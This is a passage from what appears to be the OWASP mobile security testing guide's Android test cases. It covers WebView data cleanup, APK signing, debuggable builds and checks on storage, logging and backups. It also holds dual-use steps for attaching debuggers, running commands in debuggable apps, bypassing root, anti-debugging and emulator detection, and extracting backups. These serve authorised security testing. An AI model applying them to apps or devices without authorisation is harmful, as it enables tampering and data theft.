) which will wipe all stored resource including the RAM cache. However if it's set to false, it will only clear the RAM cache. Check the app for usage of the clearCache
method and verify its input parameter. Additionally, you may also check if the app is overriding onRenderProcessUnresponsive
for the case when the WebView might become unresponsive, as the clearCache
method might also be called from there.
WebStorage APIs: WebStorage.deleteAllData
can be also used to clear all storage currently being used by the JavaScript storage APIs, including the Web SQL Database and the HTML5 Web Storage APIs.
Some apps will need to enable the DOM storage in order to display some HTML5 sites that use local storage. This should be carefully investigated as this might contain sensitive data.
Cookies: any existing cookies can be deleted by using CookieManager.removeAllCookies.
File APIs: proper data deletion in certain directories might not be that straightforward, some apps use a pragmatic solution which is to manually delete selected directories known to hold user data. This can be done using the java.io.File
API such as java.io.File.deleteRecursively
.
Example:
This example in Kotlin from the open source Firefox Focus app shows different cleanup steps:
override fun cleanup() {\n clearFormData() // Removes the autocomplete popup from the currently focused form field, if present. Note this only affects the display of the autocomplete popup, it does not remove any saved form data from this WebView's store. To do that, use WebViewDatabase#clearFormData.\n clearHistory()\n clearMatches()\n clearSslPreferences()\n clearCache(true)\n\n CookieManager.getInstance().removeAllCookies(null)\n\n WebStorage.getInstance().deleteAllData() // Clears all storage currently being used by the JavaScript storage APIs. This includes the Application Cache, Web SQL Database and the HTML5 Web Storage APIs.\n\n val webViewDatabase = WebViewDatabase.getInstance(context)\n // It isn't entirely clear how this differs from WebView.clearFormData()\n @Suppress(\"DEPRECATION\")\n webViewDatabase.clearFormData() // Clears any saved data for web forms.\n webViewDatabase.clearHttpAuthUsernamePassword()\n\n deleteContentFromKnownLocations(context) // calls FileUtils.deleteWebViewDirectory(context) which deletes all content in \"app_webview\".\n}\n
The function finishes with some extra manual file deletion in deleteContentFromKnownLocations
which calls functions from FileUtils
. These functions use the java.io.File.deleteRecursively
method to recursively delete files from the specified directories.
private fun deleteContent(directory: File, doNotEraseWhitelist: Set<String> = emptySet()): Boolean {\n val filesToDelete = directory.listFiles()?.filter { !doNotEraseWhitelist.contains(it.name) } ?: return false\n return filesToDelete.all { it.deleteRecursively() }\n}\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0037/#dynamic-analysis","title":"Dynamic Analysis","text":"Open a WebView accessing sensitive data and then log out of the application. Access the application's storage container and make sure all WebView related files are deleted. The following files and folders are typically related to WebViews:
Make sure that the release build has been signed via both the v1 and v2 schemes for Android 7.0 (API level 24) and above and via all the three schemes for Android 9 (API level 28) and above, and that the code-signing certificate in the APK belongs to the developer.
APK signatures can be verified with the apksigner
tool. It is located at [SDK-Path]/build-tools/[version]
.
$ apksigner verify --verbose Desktop/example.apk\nVerifies\nVerified using v1 scheme (JAR signing): true\nVerified using v2 scheme (APK Signature Scheme v2): true\nVerified using v3 scheme (APK Signature Scheme v3): true\nNumber of signers: 1\n
The contents of the signing certificate can be examined with jarsigner
. Note that the Common Name (CN) attribute is set to \"Android Debug\" in the debug certificate.
The output for an APK signed with a debug certificate is shown below:
$ jarsigner -verify -verbose -certs example.apk\n\nsm 11116 Fri Nov 11 12:07:48 ICT 2016 AndroidManifest.xml\n\n X.509, CN=Android Debug, O=Android, C=US\n [certificate is valid from 3/24/16 9:18 AM to 8/10/43 9:18 AM]\n [CertPath not validated: Path doesn\\'t chain with any of the trust anchors]\n(...)\n
Ignore the \"CertPath not validated\" error. This error occurs with Java SDK 7 and above. Instead of jarsigner
, you can rely on the apksigner
to verify the certificate chain.
The signing configuration can be managed through Android Studio or the signingConfig
block in build.gradle
. To activate both the v1 and v2 schemes, the following values must be set:
v1SigningEnabled true\nv2SigningEnabled true\n
Several best practices for configuring the app for release are available in the official Android developer documentation.
Last but not least: make sure that the application is never deployed with your internal testing certificates.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0038/#dynamic-analysis","title":"Dynamic Analysis","text":"Static analysis should be used to verify the APK signature.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0039/","title":"Testing whether the App is Debuggable","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0039/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0039/#static-analysis","title":"Static Analysis","text":"Check AndroidManifest.xml
to determine whether the android:debuggable
attribute has been set and to find the attribute's value:
...\n <application android:allowBackup=\"true\" android:debuggable=\"true\" android:icon=\"@drawable/ic_launcher\" android:label=\"@string/app_name\" android:theme=\"@style/AppTheme\">\n ...\n
You can use aapt
tool from the Android SDK with the following command line to quickly check if the android:debuggable=\"true\"
directive is present:
# If the command print 1 then the directive is present\n# The regex search for this line: android:debuggable(0x0101000f)=(type 0x12)0xffffffff\n$ aapt d xmltree sieve.apk AndroidManifest.xml | grep -Ec \"android:debuggable\\(0x[0-9a-f]+\\)=\\(type\\s0x[0-9a-f]+\\)0xffffffff\"\n1\n
For a release build, this attribute should always be set to \"false\"
(the default value).
adb
can be used to determine whether an application is debuggable.
Use the following command:
# If the command print a number superior to zero then the application have the debug flag\n# The regex search for these lines:\n# flags=[ DEBUGGABLE HAS_CODE ALLOW_CLEAR_USER_DATA ALLOW_BACKUP ]\n# pkgFlags=[ DEBUGGABLE HAS_CODE ALLOW_CLEAR_USER_DATA ALLOW_BACKUP ]\n$ adb shell dumpsys package com.mwr.example.sieve | grep -c \"DEBUGGABLE\"\n2\n$ adb shell dumpsys package com.nondebuggableapp | grep -c \"DEBUGGABLE\"\n0\n
If an application is debuggable, executing application commands is trivial. In the adb
shell, execute run-as
by appending the package name and application command to the binary name:
$ run-as com.vulnerable.app id\nuid=10084(u0_a84) gid=10084(u0_a84) groups=10083(u0_a83),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:untrusted_app:s0:c512,c768\n
Android Studio can also be used to debug an application and verify debugging activation for an app.
Another method for determining whether an application is debuggable is attaching jdb
to the running process. If this is successful, debugging will be activated.
The following procedure can be used to start a debug session with jdb
:
Using adb
and jdwp
, identify the PID of the active application that you want to debug:
$ adb jdwp\n2355\n16346 <== last launched, corresponds to our application\n
Create a communication channel by using adb
between the application process (with the PID) and your host computer by using a specific local port:
# adb forward tcp:[LOCAL_PORT] jdwp:[APPLICATION_PID]\n$ adb forward tcp:55555 jdwp:16346\n
Using jdb
, attach the debugger to the local communication channel port and start a debug session:
$ jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=55555\nSet uncaught java.lang.Throwable\nSet deferred uncaught java.lang.Throwable\nInitializing jdb ...\n> help\n
A few notes about debugging:
JADX
can be used to identify interesting locations for breakpoint insertion.jdb
is being bound to the local communication channel port, kill all adb sessions and start a single new session.Symbols are usually stripped during the build process, so you need the compiled bytecode and libraries to make sure that unnecessary metadata has been discarded.
First, find the nm
binary in your Android NDK and export it (or create an alias).
export NM = $ANDROID_NDK_DIR/toolchains/arm-linux-androideabi-4.9/prebuilt/darwin-x86_64/bin/arm-linux-androideabi-nm\n
To display debug symbols:
$NM -a libfoo.so\n/tmp/toolchains/arm-linux-androideabi-4.9/prebuilt/darwin-x86_64/bin/arm-linux-androideabi-nm: libfoo.so: no symbols\n
To display dynamic symbols:
$NM -D libfoo.so\n
Alternatively, open the file in your favorite disassembler and check the symbol tables manually.
Dynamic symbols can be stripped via the visibility
compiler flag. Adding this flag causes gcc to discard the function names while preserving the names of functions declared as JNIEXPORT
.
Make sure that the following has been added to build.gradle:
externalNativeBuild {\n cmake {\n cppFlags \"-fvisibility=hidden\"\n }\n}\n
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0040/#dynamic-analysis","title":"Dynamic Analysis","text":"Static analysis should be used to verify debugging symbols.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0041/","title":"Testing for Debugging Code and Verbose Error Logging","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0041/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0041/#static-analysis","title":"Static Analysis","text":"To determine whether StrictMode
is enabled, you can look for the StrictMode.setThreadPolicy
or StrictMode.setVmPolicy
methods. Most likely, they will be in the onCreate
method.
The detection methods for the thread policy are
detectDiskWrites()\ndetectDiskReads()\ndetectNetwork()\n
The penalties for thread policy violation are
penaltyLog() // Logs a message to LogCat\npenaltyDeath() // Crashes application, runs at the end of all enabled penalties\npenaltyDialog() // Shows a dialog\n
Have a look at the best practices for using StrictMode.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0041/#dynamic-analysis","title":"Dynamic Analysis","text":"There are several ways of detecting StrictMode
; the best choice depends on how the policies' roles are implemented. They include
Run execution traces with jdb, DDMS, strace
, and/or kernel modules to find out what the app is doing. You'll usually see all kinds of suspect interactions with the operating system, such as opening su
for reading and obtaining a list of processes. These interactions are surefire signs of root detection. Identify and deactivate the root detection mechanisms, one at a time. If you're performing a black box resilience assessment, disabling the root detection mechanisms is your first step.
To bypass these checks, you can use several techniques, most of which were introduced in the \"Reverse Engineering and Tampering\" chapter:
su
binary is enough to defeat root detection (try not to break your environment though!)./proc
to prevent reading of process lists. Sometimes, the unavailability of /proc
is enough to bypass such checks.Check for root detection mechanisms, including the following criteria:
Develop bypass methods for the root detection mechanisms and answer the following questions:
If root detection is missing or too easily bypassed, make suggestions in line with the effectiveness criteria listed above. These suggestions may include more detection mechanisms and better integration of existing mechanisms with other defenses.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0046/","title":"Testing Anti-Debugging Detection","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0046/#bypassing-debugger-detection","title":"Bypassing Debugger Detection","text":"There's no generic way to bypass anti-debugging: the best method depends on the particular mechanism(s) used to prevent or detect debugging and the other defenses in the overall protection scheme. For example, if there are no integrity checks or you've already deactivated them, patching the app might be the easiest method. In other cases, a hooking framework or kernel modules might be preferable. The following methods describe different approaches to bypass debugger detection:
isDebuggable
and isDebuggerConnected
to hide the debugger.When dealing with obfuscated apps, you'll often find that developers purposely \"hide away\" data and functionality in native libraries. You'll find an example of this in UnCrackable App for Android Level 2.
At first glance, the code looks like the prior challenge. A class called CodeCheck
is responsible for verifying the code entered by the user. The actual check appears to occur in the bar
method, which is declared as a native method.
package sg.vantagepoint.uncrackable2;\n\npublic class CodeCheck {\n public CodeCheck() {\n super();\n }\n\n public boolean a(String arg2) {\n return this.bar(arg2.getBytes());\n }\n\n private native boolean bar(byte[] arg1) {\n }\n}\n\n static {\n System.loadLibrary(\"foo\");\n }\n
Please see different proposed solutions for the Android Crackme Level 2 in GitHub.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0046/#effectiveness-assessment","title":"Effectiveness Assessment","text":"Check for anti-debugging mechanisms, including the following criteria:
Work on bypassing the anti-debugging defenses and answer the following questions:
If anti-debugging mechanisms are missing or too easily bypassed, make suggestions in line with the effectiveness criteria above. These suggestions may include adding more detection mechanisms and better integration of existing mechanisms with other defenses.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0047/","title":"Testing File Integrity Checks","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0047/#bypassing-file-integrity-checks","title":"Bypassing File Integrity Checks","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0047/#bypassing-the-application-source-integrity-checks","title":"Bypassing the application-source integrity checks","text":"Refer to Method Hooking for examples of patching, code injection, and kernel modules.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0047/#bypassing-the-storage-integrity-checks","title":"Bypassing the storage integrity checks","text":"Application-source integrity checks:
Run the app in an unmodified state and make sure that everything works. Apply simple patches to classes.dex
and any .so libraries in the app package. Re-package and re-sign the app as described in the \"Basic Security Testing\" chapter, then run the app. The app should detect the modification and respond in some way. At the very least, the app should alert the user and/or terminate. Work on bypassing the defenses and answer the following questions:
Storage integrity checks:
An approach similar to that for application-source integrity checks applies. Answer the following questions:
Launch the app with various reverse engineering tools and frameworks installed in your test device. Include at least the following: Frida, Xposed, Substrate for Android, RootCloak, Android SSL Trust Killer.
The app should respond in some way to the presence of those tools. For example by:
Next, work on bypassing the detection of the reverse engineering tools and answer the following questions:
The following steps should guide you when bypassing detection of reverse engineering tools:
Refer to the \"Tampering and Reverse Engineering on Android\" chapter for examples of patching, code injection, and kernel modules.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0049/","title":"Testing Emulator Detection","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0049/#bypassing-emulator-detection","title":"Bypassing Emulator Detection","text":"TelephonyManager.getDeviceID
method to return an IMEI value.Refer to the \"Tampering and Reverse Engineering on Android\" chapter for examples of patching, code injection, and kernel modules.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0049/#effectiveness-assessment","title":"Effectiveness Assessment","text":"Install and run the app in the emulator. The app should detect that it is being executed in an emulator and terminate or refuse to execute the functionality that's meant to be protected.
Work on bypassing the defenses and answer the following questions:
Make sure that all file-based detection of reverse engineering tools is disabled. Then, inject code by using Xposed, Frida, and Substrate, and attempt to install native hooks and Java method hooks. The app should detect the \"hostile\" code in its memory and respond accordingly.
Work on bypassing the checks with the following techniques:
Refer to the \"Tampering and Reverse Engineering on Android\" chapter for examples of patching, code injection, and kernel modules.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0051/","title":"Testing Obfuscation","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0051/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0051/#static-analysis","title":"Static Analysis","text":"Decompile the APK and review it to determine whether the codebase has been obfuscated.
Below you can find a sample for an obfuscated code block:
package com.a.a.a;\n\nimport com.a.a.b.a;\nimport java.util.List;\n\nclass a$b\n extends a\n{\n public a$b(List paramList)\n {\n super(paramList);\n }\n\n public boolean areAllItemsEnabled()\n {\n return true;\n }\n\n public boolean isEnabled(int paramInt)\n {\n return true;\n }\n}\n
Here are some considerations:
For native code:
Some of these techniques are discussed and analyzed in the blog post \"Security hardening of Android native code\" by Gautam Arvind and in the \"APKiD: Fast Identification of AppShielding Products\" presentation by Eduardo Novella.
For a more detailed assessment, you need a detailed understanding of the relevant threats and the obfuscation methods used. Tools such as APKiD may give you additional indications about which techniques were used for the target app such as obfuscators, packers and anti-debug measures.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0051/#dynamic-analysis","title":"Dynamic Analysis","text":"You can use APKiD to detect if the app has been obfuscated.
Example using the UnCrackable App for Android Level 4:
apkid owasp-mastg/Crackmes/Android/Level_04/r2pay-v1.0.apk\n[+] APKiD 2.1.2 :: from RedNaga :: rednaga.io\n[*] owasp-mastg/Crackmes/Android/Level_04/r2pay-v1.0.apk!classes.dex\n |-> anti_vm : Build.TAGS check, possible ro.secure check\n |-> compiler : r8\n |-> obfuscator : unreadable field names, unreadable method names\n
In this case it detects that the app has unreadable field names and method names, among other things.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0001/","title":"Testing Local Storage for Sensitive Data","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0001/#overview","title":"Overview","text":"This test case focuses on identifying potentially sensitive data stored by an application and verifying if it is securely stored. The following checks should be performed:
SharedPreferences
, databases, Internal Storage, External Storage, etc.NOTE: For MASVS L1 compliance, it is sufficient to store data unencrypted in the application's internal storage directory (sandbox). For L2 compliance, additional encryption is required using cryptographic keys securely managed in the Android KeyStore. This includes using envelope encryption (DEK+KEK) or equivalent methods, or using the Android Security Library's EncryptedFile
/EncryptedSharedPreferences
.
First of all, try to determine the kind of storage used by the Android app and to find out whether the app processes sensitive data insecurely.
AndroidManifest.xml
for read/write external storage permissions, for example, uses-permission android:name=\"android.permission.WRITE_EXTERNAL_STORAGE\"
.MODE_WORLD_READABLE
or MODE_WORLD_WRITABLE
: You should avoid using MODE_WORLD_WRITEABLE
and MODE_WORLD_READABLE
for files because any app will be able to read from or write to the files, even if they are stored in the app's private data directory. If data must be shared with other applications, consider a content provider. A content provider offers read and write permissions to other apps and can grant dynamic permission on a case-by-case basis.SharedPreferences
class ( stores key-value pairs)FileOutPutStream
class (uses internal or external storage)getExternal*
functions (use external storage)getWritableDatabase
function (returns a SQLiteDatabase for writing)getReadableDatabase
function (returns a SQLiteDatabase for reading)getCacheDir
and getExternalCacheDirs
function (use cached files)Encryption should be implemented using proven SDK functions. The following describes bad practices to look for in the source code:
A typical misuse are hard-coded cryptographic keys. Hard-coded and world-readable cryptographic keys significantly increase the possibility that encrypted data will be recovered. Once an attacker obtains the data, decrypting it is trivial. Symmetric cryptography keys must be stored on the device, so identifying them is just a matter of time and effort. Consider the following code:
this.db = localUserSecretStore.getWritableDatabase(\"SuperPassword123\");\n
Obtaining the key is trivial because it is contained in the source code and identical for all installations of the app. Encrypting data this way is not beneficial. Look for hard-coded API keys/private keys and other valuable data; they pose a similar risk. Encoded/encrypted keys represent another attempt to make it harder but not impossible to get the crown jewels.
Consider the following code:
Example in Java:
//A more complicated effort to store the XOR'ed halves of a key (instead of the key itself)\nprivate static final String[] myCompositeKey = new String[]{\n \"oNQavjbaNNSgEqoCkT9Em4imeQQ=\",\"3o8eFOX4ri/F8fgHgiy/BS47\"\n};\n
Example in Kotlin:
private val myCompositeKey = arrayOf<String>(\"oNQavjbaNNSgEqoCkT9Em4imeQQ=\", \"3o8eFOX4ri/F8fgHgiy/BS47\")\n
The algorithm for decoding the original key might be something like this:
Example in Java:
public void useXorStringHiding(String myHiddenMessage) {\n byte[] xorParts0 = Base64.decode(myCompositeKey[0],0);\n byte[] xorParts1 = Base64.decode(myCompositeKey[1],0);\n\n byte[] xorKey = new byte[xorParts0.length];\n for(int i = 0; i < xorParts1.length; i++){\n xorKey[i] = (byte) (xorParts0[i] ^ xorParts1[i]);\n }\n HidingUtil.doHiding(myHiddenMessage.getBytes(), xorKey, false);\n}\n
Example in Kotlin:
fun useXorStringHiding(myHiddenMessage:String) {\n val xorParts0 = Base64.decode(myCompositeKey[0], 0)\n val xorParts1 = Base64.decode(myCompositeKey[1], 0)\n val xorKey = ByteArray(xorParts0.size)\n for (i in xorParts1.indices)\n {\n xorKey[i] = (xorParts0[i] xor xorParts1[i]).toByte()\n }\n HidingUtil.doHiding(myHiddenMessage.toByteArray(), xorKey, false)\n}\n
Verify common locations of secrets:
<resources>\n <string name=\"app_name\">SuperApp</string>\n <string name=\"hello_world\">Hello world!</string>\n <string name=\"action_settings\">Settings</string>\n <string name=\"secret_key\">My_Secret_Key</string>\n </resources>\n
buildTypes {\n debug {\n minifyEnabled true\n buildConfigField \"String\", \"hiddenPassword\", \"\\\"${hiddenPassword}\\\"\"\n }\n}\n
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0001/#dynamic-analysis","title":"Dynamic Analysis","text":"Install and use the app, executing all functions at least once. Data can be generated when entered by the user, sent by the endpoint, or shipped with the app. Then complete the following:
/data/data/<package-name>/databases
./data/data/<package-name>/shared_prefs
) for sensitive information. Shared Preferences are insecure and unencrypted by default. Some apps might opt to use secure-preferences to encrypt the values stored in Shared Preferences./data/data/<package-name>
. Only the user and group created when you installed the app (e.g., u0_a82) should have user read, write, and execute permissions (rwx
). Other users should not have permission to access files, but they may have execute permissions for directories.https://_firebaseProjectName_.firebaseio.com/.json
/data/data/<package-name>/files/
, whether it is unencrypted, and whether it contains sensitive information. By default, the file extension is realm
and the file name is default
. Inspect the Realm database with the Realm Browser.This test case focuses on identifying any sensitive application data within both system and application logs. The following checks should be performed:
As a general recommendation to avoid potential sensitive application data leakage, logging statements should be removed from production releases unless deemed necessary to the application or explicitly identified as safe, e.g. as a result of a security audit.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0003/#static-analysis","title":"Static Analysis","text":"Applications will often use the Log Class and Logger Class to create logs. To discover this, you should audit the application's source code for any such logging classes. These can often be found by searching for the following keywords:
Functions and classes, such as:
android.util.Log
Log.d
| Log.e
| Log.i
| Log.v
| Log.w
| Log.wtf
Logger
Keywords and system output:
System.out.print
| System.err.print
While preparing the production release, you can use tools like ProGuard (included in Android Studio). To determine whether all logging functions from the android.util.Log
class have been removed, check the ProGuard configuration file (proguard-rules.pro) for the following options (according to this example of removing logging code and this article about enabling ProGuard in an Android Studio project):
-assumenosideeffects class android.util.Log\n{\n public static boolean isLoggable(java.lang.String, int);\n public static int v(...);\n public static int i(...);\n public static int w(...);\n public static int d(...);\n public static int e(...);\n public static int wtf(...);\n}\n
Note that the example above only ensures that calls to the Log class' methods will be removed. If the string that will be logged is dynamically constructed, the code that constructs the string may remain in the bytecode. For example, the following code issues an implicit StringBuilder
to construct the log statement:
Example in Java:
Log.v(\"Private key tag\", \"Private key [byte format]: \" + key);\n
Example in Kotlin:
Log.v(\"Private key tag\", \"Private key [byte format]: $key\")\n
The compiled bytecode, however, is equivalent to the bytecode of the following log statement, which constructs the string explicitly:
Example in Java:
Log.v(\"Private key tag\", new StringBuilder(\"Private key [byte format]: \").append(key.toString()).toString());\n
Example in Kotlin:
Log.v(\"Private key tag\", StringBuilder(\"Private key [byte format]: \").append(key).toString())\n
ProGuard guarantees removal of the Log.v
method call. Whether the rest of the code (new StringBuilder ...
) will be removed depends on the complexity of the code and the ProGuard version.
This is a security risk because the (unused) string leaks plain text data into memory, which can be accessed via a debugger or memory dumping.
Unfortunately, no silver bullet exists for this issue, but one option would be to implement a custom logging facility that takes simple arguments and constructs the log statements internally.
SecureLog.v(\"Private key [byte format]: \", key);\n
Then configure ProGuard to strip its calls.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0003/#dynamic-analysis","title":"Dynamic Analysis","text":"Use all the mobile app functions at least once, then identify the application's data directory and look for log files (/data/data/<package-name>
). Check the application logs to determine whether log data has been generated; some mobile applications create and store their own logs in the data directory.
Many application developers still use System.out.println
or printStackTrace
instead of a proper logging class. Therefore, your testing strategy must include all output generated while the application is starting, running and closing. To determine what data is directly printed by System.out.println
or printStackTrace
, you can use Logcat
as explained in the chapter \"Basic Security Testing\", section \"Monitoring System Logs\".
Remember that you can target a specific app by filtering the Logcat output as follows:
adb logcat | grep \"$(adb shell ps | grep <package-name> | awk '{print $2}')\"\n
If you already know the app PID you may give it directly using --pid
flag.
You may also want to apply further filters or regular expressions (using logcat
's regex flags -e <expr>, --regex=<expr>
for example) if you expect certain strings or patterns to come up in the logs.
To determine whether API calls and functions provided by the third-party library are used according to best practices, review their source code, requested permissions and check for any known vulnerabilities.
All data that's sent to third-party services should be anonymized to prevent exposure of PII (Personal Identifiable Information) that would allow the third party to identify the user account. No other data (such as IDs that can be mapped to a user account or session) should be sent to a third party.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0004/#dynamic-analysis","title":"Dynamic Analysis","text":"Check all requests to external services for embedded sensitive information. To intercept traffic between the client and server, you can perform dynamic analysis by launching a man-in-the-middle (MITM) attack with Burp Suite Professional or OWASP ZAP. Once you route the traffic through the interception proxy, you can try to sniff the traffic that passes between the app and server. All app requests that aren't sent directly to the server on which the main function is hosted should be checked for sensitive information, such as PII in a tracker or ad service.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0005/","title":"Determining Whether Sensitive Data Is Shared with Third Parties via Notifications","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0005/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0005/#static-analysis","title":"Static Analysis","text":"Search for any usage of the NotificationManager
class which might be an indication of some form of notification management. If the class is being used, the next step would be to understand how the application is generating the notifications and which data ends up being shown.
Run the application and start tracing all calls to functions related to the notifications creation, e.g. setContentTitle
or setContentText
from NotificationCompat.Builder
. Observe the trace in the end and evaluate if it contains any sensitive information which another app might have eavesdropped.
In the layout definition of an activity, you can define TextViews
that have XML attributes. If the XML attribute android:inputType
is given the value textNoSuggestions
, the keyboard cache will not be shown when the input field is selected. The user will have to type everything manually.
<EditText\n android:id=\"@+id/KeyBoardCache\"\n android:inputType=\"textNoSuggestions\" />\n
The code for all input fields that take sensitive information should include this XML attribute to disable the keyboard suggestions.
Alternatively, the developer can use the following constants:
XMLandroid:inputType
Code InputType
API level textPassword
TYPE_TEXT_VARIATION_PASSWORD
3 textVisiblePassword
TYPE_TEXT_VARIATION_VISIBLE_PASSWORD
3 numberPassword
TYPE_NUMBER_VARIATION_PASSWORD
11 textWebPassword
TYPE_TEXT_VARIATION_WEB_PASSWORD
11 Check the application code to verify that none of the input types are being overwritten. For example, by doing findViewById(R.id.KeyBoardCache).setInputType(InputType.TYPE_CLASS_TEXT)
the input type of the input field KeyBoardCache
is set to text
reenabling the keyboard cache.
Finally, check the minimum required SDK version in the Android Manifest (android:minSdkVersion
) since it must support the used constants (for example, Android SDK version 11 is required for textWebPassword
). Otherwise, the compiled app would not honor the used input type constants allowing keyboard caching.
Start the app and click in the input fields that take sensitive data. If strings are suggested, the keyboard cache has not been disabled for these fields.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/","title":"Testing Backups for Sensitive Data","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#local","title":"Local","text":"Check the AndroidManifest.xml
file for the following flag:
android:allowBackup=\"true\"\n
If the flag value is true, determine whether the app saves any kind of sensitive data (check the test case \"Testing for Sensitive Data in Local Storage\").
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#cloud","title":"Cloud","text":"Regardless of whether you use key/value backup or auto backup, you must determine the following:
If you don't want to share files with Google Cloud, you can exclude them from Auto Backup. Sensitive information stored at rest on the device should be encrypted before being sent to the cloud.
android:allowBackup
within the application's manifest file. Auto Backup is enabled by default for applications that target Android 6.0 (API level 23). You can use the attribute android:fullBackupOnly
to activate auto backup when implementing a backup agent, but this attribute is available for Android versions 6.0 and above only. Other Android versions use key/value backup instead.android:fullBackupOnly\n
Auto backup includes almost all the app files and stores up 25 MB of them per app in the user's Google Drive account. Only the most recent backup is stored; the previous backup is deleted.
AndroidManifest.xml
for the following attribute:android:backupAgent\n
To implement key/value backup, extend one of the following classes:
To check for key/value backup implementations, look for these classes in the source code.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#dynamic-analysis","title":"Dynamic Analysis","text":"After executing all available app functions, attempt to back up via adb
. If the backup is successful, inspect the backup archive for sensitive data. Open a terminal and run the following command:
adb backup -apk -nosystem <package-name>\n
ADB should respond now with \"Now unlock your device and confirm the backup operation\" and you should be asked on the Android phone for a password. This is an optional step and you don't need to provide one. If the phone does not prompt this message, try the following command including the quotes:
adb backup \"-apk -nosystem <package-name>\"\n
The problem happens when your device has an adb version prior to 1.0.31. If that's the case you must use an adb version of 1.0.31 also on your host computer. Versions of adb after 1.0.32 broke the backwards compatibility.
Approve the backup from your device by selecting the Back up my data option. After the backup process is finished, the file .ab will be in your working directory. Run the following command to convert the .ab file to tar.
dd if=mybackup.ab bs=24 skip=1|openssl zlib -d > mybackup.tar\n
In case you get the error openssl:Error: 'zlib' is an invalid command.
you can try to use Python instead.
dd if=backup.ab bs=1 skip=24 | python -c \"import zlib,sys;sys.stdout.write(zlib.decompress(sys.stdin.read()))\" > backup.tar\n
The Android Backup Extractor is another alternative backup tool. To make the tool to work, you have to download the Oracle JCE Unlimited Strength Jurisdiction Policy Files for JRE7 or JRE8 and place them in the JRE lib/security folder. Run the following command to convert the tar file:
java -jar abe.jar unpack backup.ab\n
if it shows some Cipher information and usage, which means it hasn't unpacked successfully. In this case you can give a try with more arguments:
abe [-debug] [-useenv=yourenv] unpack <backup.ab> <backup.tar> [password]\n
[password]
is the password when your android device asked you earlier. For example here is: 123
java -jar abe.jar unpack backup.ab backup.tar 123\n
Extract the tar file to your working directory.
tar xvf mybackup.tar\n
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/","title":"Testing Memory for Sensitive Data","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#overview","title":"Overview","text":"Analyzing memory can help developers identify the root causes of several problems, such as application crashes. However, it can also be used to access sensitive data. This section describes how to check for data disclosure via process memory.
First identify sensitive information that is stored in memory. Sensitive assets have likely been loaded into memory at some point. The objective is to verify that this information is exposed as briefly as possible.
To investigate an application's memory, you must first create a memory dump. You can also analyze the memory in real-time, e.g., via a debugger. Regardless of your approach, memory dumping is a very error-prone process in terms of verification because each dump contains the output of executed functions. You may miss executing critical scenarios. In addition, overlooking data during analysis is probable unless you know the data's footprint (either the exact value or the data format). For example, if the app encrypts with a randomly generated symmetric key, you likely won't be able to spot it in memory unless you can recognize the key's value in another context.
Therefore, you are better off starting with static analysis.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#static-analysis","title":"Static Analysis","text":"When performing static analysis to identify sensitive data that is exposed in memory, you should:
String
and BigInteger
).StringBuilder
).finalize
method.The following section describes pitfalls of data leakage in memory and best practices for avoiding them.
Don't use immutable structures (e.g., String
and BigInteger
